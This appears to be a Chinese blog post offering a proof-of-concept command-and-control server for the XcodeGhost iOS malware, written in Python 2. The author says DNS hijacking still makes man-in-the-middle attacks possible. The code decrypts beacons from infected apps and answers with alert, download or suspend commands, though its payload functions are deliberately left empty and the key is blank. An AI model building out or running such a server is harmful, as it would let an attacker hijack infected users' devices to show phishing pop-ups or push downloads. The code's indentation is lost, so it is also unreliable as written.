XcodeGhost-Poc

这个危害个人感觉还是比较大的,虽然现在域名已经挂了,但是dns劫持还是可以的,在一段时间内基于xcodeGhost的中间人攻击应该会比较多。
发布版本去掉了功能模块,望谅解
三流业余水平,勿喷 代码留了三个坑,防伸手党


import BaseHTTPServer
import urllib
from pyDes import *
import binascii
import json
import re

# Serverip init.icloud-analysis.com
class MyHTTPHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):

datas = self.rfile.read(int(self.headers['content-length']))

#以下为包长度,命令长度,程序版本输出
hexstr = binascii.b2a_hex(datas)
bodyLen = int(hexstr[0:8],16)
cmdLen = int(hexstr[8:12],16)
ver = int(hexstr[12:16],16)
#输出结束

k = des("", ECB, IV=None, pad=None, padmode=PAD_PKCS5)
decode = k.decrypt(datas)
jsonDecode = '{' + ''.join(re.findall("{([\s\S]*?)}",decode)).strip() + '}'
print "bodyLen:",bodyLen,"cmdLen:",cmdLen,"ver:",ver,"\n",jsonDecode
jsonLoad = json.loads(jsonDecode)
print 'status:' , jsonLoad["status"]
#if
if jsonLoad["status"] == "launch":
response = download()
elif jsonLoad["status"] == "resignActive":
response = alert()
elif jsonLoad["status"] == "suspend":
response = suspend()
print '--------------------------------'
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.send_header("Content-Length", str(len(response)))
self.end_headers()
self.wfile.write(response)

def alert(): #弹窗
print "alert()"
''''''
encodeAlert = ''
return encodeAlert
def download(): #下载
print "download"
''''''
encodeDownload = ''
return encodeDownload
def suspend(): #挂起
print "sleep"
''''''
encodeSuspend = ''
return encodeSuspend

if __name__ == "__main__":
HOST, PORT = "localhost", 80 #ip
server = BaseHTTPServer.HTTPServer((HOST, PORT), MyHTTPHandler)
try:
server.serve_forever()
except KeyboardInterrupt:
print "\nend"

2015092414363499340

XcodeGhost-Poc》上有1条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注